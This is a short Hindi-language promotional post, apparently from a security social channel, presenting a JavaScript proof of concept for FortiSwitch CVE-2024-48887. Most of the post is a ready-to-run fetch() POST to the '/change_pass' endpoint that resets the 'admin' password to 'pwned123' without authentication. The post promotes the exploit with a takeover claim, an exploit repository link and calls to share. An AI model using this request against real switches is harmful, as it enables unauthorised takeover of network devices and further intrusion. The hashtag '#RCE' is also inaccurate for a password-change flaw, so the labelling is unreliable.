
एक हल्का JavaScript स्निपेट जो दर्शाता है कि कैसे कमजोर Fortinet FortiSwitch GUI एंडपॉइंट्स पर अनधिकृत पासवर्ड परिवर्तन को ट्रिगर किया जा सकता है।
🚨 FortiSwitch CVE-2024-48887 PoC (JavaScript) 🚨
🔥 एक हल्का JavaScript स्निपेट जारी किया गया है जो दिखाता है कि कैसे कमजोर Fortinet FortiSwitch GUI एंडपॉइंट पर अनधिकृत पासवर्ड परिवर्तन ट्रिगर किए जा सकते हैं।
🛠️ भेद्यता के बारे में: एक हमलावर बिना किसी प्रमाणीकरण के, सीधे /change_pass एंडपॉइंट वेरिएंट को लक्षित करते हुए, पासवर्ड सेटिंग्स में हेरफेर करने के लिए एक सरल fetch() अनुरोध तैयार कर सकता है।
fetch('http://target-ip/change_pass', {
method: 'POST',
headers: { 'Content-Type': 'application/json' },
body: JSON.stringify({
username: 'admin',
newpass: 'pwned123',
confirm: 'pwned123'
})
})
.then(res => res.text())
.then(data => console.log('Response:', data));
💡 प्रभाव: पूर्ण स्विच टेकओवर, पार्श्व गति की संभावना, और नेटवर्क समझौता।
📁 रिपॉजिटरी: github.com/yourusername/CVE-2024-48887-FortiSwitch-Exploit ⭐ रिपॉजिटरी को स्टार करें और अपने इन्फोसेक साथियों के साथ साझा करें!
📢 @cybersecplayground के माध्यम से पूर्ण विश्लेषण और रीयल-टाइम अलर्ट का पालन करें
#JavaScript #infosec #bugbounty #CVE2024 #Fortinet #FortiSwitch #RCE #exploitdev #cybersecurity #PoC #github #OSINT #cybersecplayground